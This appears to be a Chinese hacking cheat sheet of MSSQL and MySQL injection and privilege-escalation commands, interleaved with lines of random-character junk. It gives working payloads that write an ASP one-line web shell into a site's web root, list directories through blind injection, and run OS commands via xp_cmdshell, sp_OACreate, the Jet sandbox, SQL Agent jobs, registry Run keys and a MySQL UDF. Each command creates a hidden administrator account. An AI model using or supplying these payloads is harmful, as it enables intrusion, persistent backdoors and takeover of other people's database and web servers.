mssql实用命令及导出一句话

admin

MSSQL语句导出一句话木马
首先确定网站的WEB路径
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
- B/ j7 W1 g4 l1 a, R* r7 v% s4 F
* R( x3 J1 S1 O, V;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
5 [5 V* @/ W- x: _1 U//将一句话木马插入表中

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
//导出一个ASP文件
/ N: V* u9 J! i

关于MSSQL列目录
5 c% a" A! g* B' F& N3 E& F  B3 k;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表

1 S8 j3 L  I7 }# u3 gand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录

9 M- b  x0 E9 A: JAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段

& K) k* Y! w# Z; B, }/ BAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符


数据库版本和权限查看
3 j& l; M5 [5 G* s0 G- t' H, Tand 1=(select @@VERSION) //查看详细的数据库信息.
) s: S7 L/ `. Z1 w, Wand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
3 f2 q2 m. M9 F) W! hand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
, ^7 m. b% E4 R5 L% d( K( N2 K

1.利用xp_cmdshell执行命令
1 d3 N1 _3 ~  `; X4 rexec master..xp_cmdshell 'net user rfire 123456 /add'
9 b* T5 H8 s$ z# u) J& d+ b7 Wexec master..xp_cmdshell 'net localgroup administrators rfire /add'
3 _' K( s: G  O
恢复xp_cmdshell存储过程
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
0 {: e" o; F6 q! y! x$ D8 ]

2.利用SP_OAcreate和SP_OAMETHOD执行命令
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
9 y, x1 m* ~  T; J( ?DECLARE @shell INT //建立一个@shell实体
* V% l. x/ x9 S+ ^) r0 N' d" gEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
6 j- r" n) D; Z. d3 MEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例

  {- d$ Q. h4 N
3.利用沙盒模式
! \/ R: Q3 O! G; r4 B4 O先利用xp_regwrite（前提是要求xp_regwrite存在）改注册表，然后用OpenRowSet访问系统自身mdb文件，然后执行SQL语句。
4 I: L: O) v' E$ W6 _1 _+ Z6 \开启沙盒模式：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0

$ p1 g. A3 S: j; b- d2 O执行命令：
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');


6 Y& ]9 U" O% Q' z# Y8 a7 R: X4.利用SQL代理执行命令
. N: }$ d  N+ Y! Z8 Y2 F8 N5 W1 LEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
* |6 h4 ^# l* o8 o; C8 j
; c' b5 n  _; }" ^7 q$ ]执行命令：
5 r2 Y- a7 |/ z9 B% f4 Ruse msdb exec sp_delete_job null,'x' //进入msdb数据库，删除x作业防止出错
exec sp_add_job 'x'
5 N& {2 W% E# Y. M, Rexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
% Y* t5 E1 Z# H. x( Dexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业

2 V4 K5 f2 v0 _# E
% z0 W9 m- }: b$ D: _5.利用注册表项执行命令（用xp_regwrite将执行命令写入启动项）
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
, t+ V6 S3 h5 u
+ m2 ]' i. L5 j3 E1 k: F! C
6.MYSQL的命令执行
& `$ Q6 g2 i, Y' \MYSQL的UDF自定义函数提权（要求账号拥有insert和delete权限）
首先要在su.php下导出c:\windows\udf.dll
导出后执行创建自定义函数命令：
% f& L! |5 @; l+ [, ACreate Function cmdshell returns string soname 'udf.dll'
执行命令
select cmdshell('net user rfire 123456 /add')
7 p9 x& n! l" d2 _& u$ u. G. d+ x执行后删除函数 drop function cmdshell
- Z+ Z% O4 v, V: r0 ~- S